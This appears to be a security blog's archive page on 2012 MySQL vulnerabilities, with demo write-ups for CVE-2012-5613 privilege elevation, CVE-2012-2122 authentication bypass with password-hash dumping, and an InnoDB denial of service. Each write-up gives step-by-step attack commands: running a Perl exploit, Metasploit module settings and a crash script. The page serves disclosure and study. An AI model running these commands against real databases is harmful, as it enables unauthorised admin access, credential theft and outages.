Tag Archives: MySQL

Year 2012 Main Exploitable Vulnerabilities Interactive Timeline

You can find, by clicking on the following image, a visualization timeline of the main exploitable vulnerabilities of year 2012.

Start date of a slide is corresponding to:

  • the date of discovery of the vulnerability, or
  • the date of report to the vendor, or
  • the date of public release of the vulnerability

End date of a slide is corresponding to:

  • the date of vendor security alert notification, or
  • the date of Metasploit integration, or
  • the date of fix, or
  • the date of PoC disclosure
Year 2012 Main Exploitable Vulnerabilities Interactive Timeline
Year 2012 Main Exploitable Vulnerabilities Interactive Timeline

CVE-2012-5613 MySQL Database Privilege Elevation 0day Exploit Demo

Timeline :

Vulnerability discovered by @kingcope
Vulnerability disclosed by @kingcope the 2012-12-01

PoC provided by :

kingcope

Reference(s) :

CVE-2012-5613
Full Disclosure Mailing-list
Red Hat Bugzilla

Affected version(s) :

MySQL 5.0
MySQL 5.1
Other ?

Tested on Centos 5.8 x86 with :

MySQL Server version 5.0.95 Source distribution

Description :

An attacker with access to a MySQL database through a user having some specific privileges, will be allowed, through this vulnerability to create a MySQL administrator user. The created user specified in the PoC script is by default “rootedbox2” with “rootedbox2” as password.

Commands :

On the target side :
CREATE DATABASE exampledb;
GRANT ALL PRIVILEGES ON exampledb.* TO user1@'192.168.178.26' IDENTIFIED BY 'test';
GRANT FILE ON *.* TO user1@'192.168.178.26' IDENTIFIED BY 'test'; 
FLUSH PRIVILEGES;

On the attacker side :
mysql -u user1 -h 192.168.178.34 -p exampledb -> allowed
mysql -u rootedbox2 -h 192.168.178.34 -p -> denied
perl mysql_privilege_elevation.pl 
mysql -u rootedbox2 -h 192.168.178.34 -p -> allowed

CVE-2012-2122 Oracle MySQL Authentication Bypass Password Dump Metasploit Demo

Timeline :

Vulnerability discovered by Sergei Golubchik in April 2012
Bug reported to vendor by Sergei Golubchik the 2012-04-06
Public release of the vulnerability the 2012-06-09
Metasploit PoC provided the 2012-06-11

PoC provided by :

Yorick Koster
jcran

Reference(s) :

CVE-2012-2122
Oracle MySQL BUG 64884
Oracle MySQL 5.1.63 Changes
Oracle MySQL 5.5.24 Changes

Affected version(s) :

Oracle MySQL versions before or equal to 5.1.61 (on some platforms)
Oracle MySQL versions before or equal to 5.5.24 (on some platforms)

Tested on Fedora release 16 (Verne) with :

5.5.23 MySQL Community Server

Description :

The targeted username will need to have allowed remote connections, like :

grant all on *.* to root@'%' identified by 'password';

This module exploits a password bypass vulnerability in MySQL in order to extract the usernames and encrypted password hashes from a MySQL server. These hashes ares stored as loot for later cracking.

Commands :

use auxiliary/scanner/mysql/mysql_authbypass_hashdump
set RHOSTS 192.168.178.43
set USERNAME root
run

Oracle MySQL InnoDB Bugs 13510739 and 63775 DoS Demo

Timeline :

Public release of the vulnerabilities the 2012-03-21
Details of the vulnerability published by Oracle the 2012-04-10
PoC provided by Oracle the 2012-03-21 in the source code of 5.5.22 and 5.1.62

PoC provided by :

Oracle

Reference(s) :

SA48744
MySQL 5.5.22 release note
MySQL 5.1.62 release note
Eric Romang Pastebin

Affected version(s) :

MySQL Server 5.5.21 and previous versions
MySQL Server 5.1.61 and previous versions

Tested on Centos 5 with :

MySQL 5.5.21

Description :

Oracle has release, the 21 March, two new versions of MySQL, version 5.5.22 and 5.1.62. These versions have fix two bugs #13510739 and #63775 how are considered as security fixes. But no impact details of these bugs are provided and the bugs report are closed.
Unfortunately for Oracle the two new versions were shipped with a development script “mysql-test/suite/innodb/t/innodb_bug13510739.test” in order to test the fix of the vulnerabilities, a PoC provided by Oracle. The bugs cause a denial of service of MySQL “ON HANDLER READ NEXT AFTER DELETE RECORD“. All the details are available in the script or on the upper Pastebin link.

Commands :

mysql -u root -p database < innodb_bug13510739.test